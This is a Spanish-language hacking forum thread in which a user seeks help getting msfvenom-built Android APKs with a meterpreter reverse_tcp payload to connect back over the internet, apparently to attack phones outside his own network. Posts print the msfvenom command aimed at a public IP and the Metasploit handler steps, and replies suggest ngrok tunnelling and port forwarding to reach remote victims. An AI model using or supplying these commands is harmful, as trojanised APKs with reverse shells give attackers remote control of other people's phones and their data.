Autor
|
Tema: Problema, ataques fuera de red. (Leído 5,255 veces)
|
painpills
Desconectado
Mensajes: 40
404
|
Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad. El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera. msfvenom -p android/meterpreter/reverse_tcp lhost=<mi ip publica> lport=4444 R>/root/Escritorio/aplicacion.apk Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma. 1) use exploit/multi/hander2) set payload android/meterpreter/reverse_tcp 3) set lport=<mi ip local> y también set lport=4445) exploitAún configurando la aplicación de esa manera sigue sin funcionar ¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo? ¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local. Gracias.
|
|
|
En línea
|
|
|
|
UnaiiM
Desconectado
Mensajes: 151
The art of programming is the skill of controlling
|
Haber pero si lo haces fuera de la red local lo lógico es usar algo como ngrok. Ya que por lo que entiendo tu le estas diciendo al exploit que al ser ejecutado se conecte a una ip de una red la cual la persona que quieres atacar no esta en esa red. Haber ngrok haces público tu local host. No se si me equivoco, ya que no estoy muy informado en este tema,... Salu2!
|
|
« Última modificación: 6 Marzo 2020, 09:59 am por Depredador »
|
En línea
|
|
|
|
painpills
Desconectado
Mensajes: 40
404
|
No es una solución en si, ya que antes podía realizar ese tipo de tareas sin necesidad de otras aplicaciones, simplemente metasploit y no-ip, pero con el problema que se me ha presentado ngrok me ha sido muy útil, gracias por la información.
|
|
|
En línea
|
|
|
|
@XSStringManolo
Hacker/Programador
Colaborador
Desconectado
Mensajes: 2.399
Turn off the red ligth
|
Tienes los puertos del router abiertos?
Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444. Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.
Por comodidad puedes usar print working directory en lugar de poner la ruta manual.
msfvenom -p android/meterpreter/reverse_tcp lhost=<mi ip publica> lport=4444 R > pwd
Cuando sea así prueba con el netcat a la escucha en el puerto 4444.
A mi me van horribles las .apk generadas con msfvenom.
|
|
|
En línea
|
Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖
|
|
|
painpills
Desconectado
Mensajes: 40
404
|
Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta. La única herramienta que instalé en ese entonces fue NO-IP. Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444. Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.
|
|
« Última modificación: 10 Marzo 2020, 07:49 am por N0I$E »
|
En línea
|
|
|
|
@XSStringManolo
Hacker/Programador
Colaborador
Desconectado
Mensajes: 2.399
Turn off the red ligth
|
Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta. La única herramienta que instalé en ese entonces fue NO-IP. Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes Comprueba con netcat si te funciona correctamente la apertura y cierre de puertos. Si no te funciona llama a tu ISP y dile que abriste los puertos y no te llegan los paquetes, que te habiliten abrir y cerrar puertos cuando consideres, si no te cambias de compañía. Si pones tu equipo como DMZ lo expones a internet y si no tienes un firewall de internet a tu DMZ y otro firewall que evite conexiones de tu DMZ a tu red local estás totalmente expuesto.
|
|
|
En línea
|
Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problema El subindice esta fuera de intervalo
Programación Visual Basic
|
ninto33
|
5
|
8,348
|
8 Febrero 2010, 08:19 am
por BlackZeroX
|
|
|
problema con politica proxy fuera de la red empresarial
Redes
|
carlos_zr2003
|
1
|
2,249
|
13 Octubre 2010, 19:52 pm
por y0g-s0th0th
|
|
|
Problema con SocualEngineerToolkit (No registra datos fuera de LAN)
Hacking
|
bastri
|
1
|
2,614
|
5 Marzo 2012, 00:21 am
por bastri
|
|
|
problema con backdoor fuera de lan
Dudas Generales
|
Wilkin07
|
1
|
2,506
|
29 Septiembre 2016, 19:25 pm
por simorg
|
|
|
Ataques fuera de la red local...
Hacking
|
UnaiiM
|
0
|
1,959
|
12 Mayo 2019, 14:23 pm
por UnaiiM
|
|